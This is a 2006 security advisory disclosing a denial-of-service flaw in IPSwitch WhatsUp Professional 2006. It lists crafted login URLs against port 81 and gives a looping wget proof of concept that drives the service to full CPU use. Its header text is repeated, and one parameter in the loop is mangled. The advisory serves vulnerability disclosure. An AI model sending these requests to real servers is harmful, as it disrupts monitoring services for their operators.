Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw
Product: IPSwitch WhatsUp
http://www.ipswitch.com
Version: Confirmed on WhatsUp Professional 2006
Author: Josh Zlatin-Amishav
Date: February 22, 2006
Background:
WhatsUp Professional 2006 is application and network management that keeps your
critical business technology, like email servers and databases, working
efficiently so you can run your business.
Issue:
The NmService.exe executable does not handle certain requests properly. The
following URLs can be used to create a DoS condition due to the NmService using
100% CPU
Product: IPSwitch WhatsUp
http://www.ipswitch.com
Version: Confirmed on WhatsUp Professional 2006
Author: Josh Zlatin-Amishav
Date: February 22, 2006
Background:
WhatsUp Professional 2006 is application and network management that keeps your
critical business technology, like email servers and databases, working
efficiently so you can run your business.
Issue:
The NmService.exe executable does not handle certain requests properly. The
following URLs can be used to create a DoS condition due to the NmService using
100% CPU
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLogin
Password=&btnLogIn=[Log&In]=&sLoginUserName=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLogin
UserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLogin
UserName=&sLoginPassword=&In]=&btnLogIn=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLogin
UserName=&sLoginPassword=&btnLogIn=[Log&In]=
PoC:
while [ 1 ];
do
wget -O /dev/null http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLogin
Password=&b;tnLogIn=[Log&In]=&sLoginUserName=;
done
References:
http://www.ipswitch.com
http://zur.homelinux.com/Advisories/ipswitch_dos.txt
[ reply ]